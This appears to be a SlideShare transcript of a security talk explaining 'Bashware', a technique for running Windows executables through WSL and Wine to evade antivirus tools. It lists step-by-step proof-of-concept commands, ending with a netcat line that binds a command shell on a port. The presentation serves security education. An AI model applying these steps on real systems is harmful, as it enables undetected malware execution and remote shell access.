Successfully reported this slideshow.
Your SlideShare is downloading. ×

Executing Windows Malware through WSL (Bashware)

More Related Content

Related Books

Free with a 30 day trial from Scribd

See all

Related Audiobooks

Free with a 30 day trial from Scribd

See all

Executing Windows Malware through WSL (Bashware)

  1. 1. Bashware A malware execution technique
  2. 2. /usr/bin/who • null and OWASP Bangalore chapter leader • A decade of security experience in various technologies • Security researcher and evangelist • Speaker and trainer at several security conferences • https://ibreak.software • @riyazwalikar | @wincmdfu
  3. 3. What is Bashware? • A technique researched by Check Point Security that can be used by malware to run using the Windows Subsystem for Linux (WSL) and not be detected by security solutions (like AV etc.) • Basically a way to run PE executables using the WSL • Bash + (mal)ware
  4. 4. Back to Basics • How does malware (pick any) infect a Windows machine? • How is it detected? Any examples of detection techniques?
  5. 5. An overview of WSL • WSL is a collection of components that enables native Linux ELF64 binaries to run on Windows. It contains both user mode and kernel mode components. It is primarily comprised of: • User mode session manager service that handles the Linux instance life cycle • Pico provider drivers (lxss.sys, lxcore.sys) that emulate a Linux kernel by translating Linux syscalls • Pico processes that host the unmodified user mode Linux (e.g. /bin/bash)
  6. 6. Demo of WSL
  7. 7. Bashware Video Demo • https://www.youtube.com/watch?v=fwEQFMbHIV8
  8. 8. Let’s build a PoC!
  9. 9. According to the video/blogpost • Enable WSL • Enable Developer mode • Install Linux components • Install WineHQ • Run Windows binary through Wine
  10. 10. Step 1: Enable WSL dism /Online /Enable-Feature /All /FeatureName:Microsoft- Windows-Subsystem-Linux /NoRestart Enable-WindowsOptionalFeature -O -F Microsoft-Windows- Subsystem-Linux
  11. 11. Step 2: Enable Developer mode • Set the following registry values [HKEY_LOCAL_MACHINESOFTWAREMicrosoftWindowsCurrentVersionAppModelUnlock] "AllowAllTrustedApps"=dword:1 "AllowDevelopmentWithoutDevLicense"=dword:1
  12. 12. Step 3: Install Linux components • lxrun /install /y
  13. 13. Step 4: Install Wine dpkg --add-architecture i386 add-apt-repository -y ppa:ubuntu-wine/ppa apt-get update apt-get install wine1.6-amd64
  14. 14. Step 5: Run PE binary using wine wine64 nc64.exe -lvp 1337 -e cmd
  15. 15. Demo
  16. 16. • Riyaz Walikar • https://ibreak.software • @riyazwalikar | @wincmdfu
  17. 17. References • https://research.checkpoint.com/beware-bashware-new-method- malware-bypass-security-solutions/ • https://www.youtube.com/watch?v=fwEQFMbHIV8 • https://blogs.msdn.microsoft.com/wsl/2016/04/22/windows- subsystem-for-linux-overview/ • https://ibreak.software/executing-windows-malware-in-windows- subsystem-for-linux-bashware/

×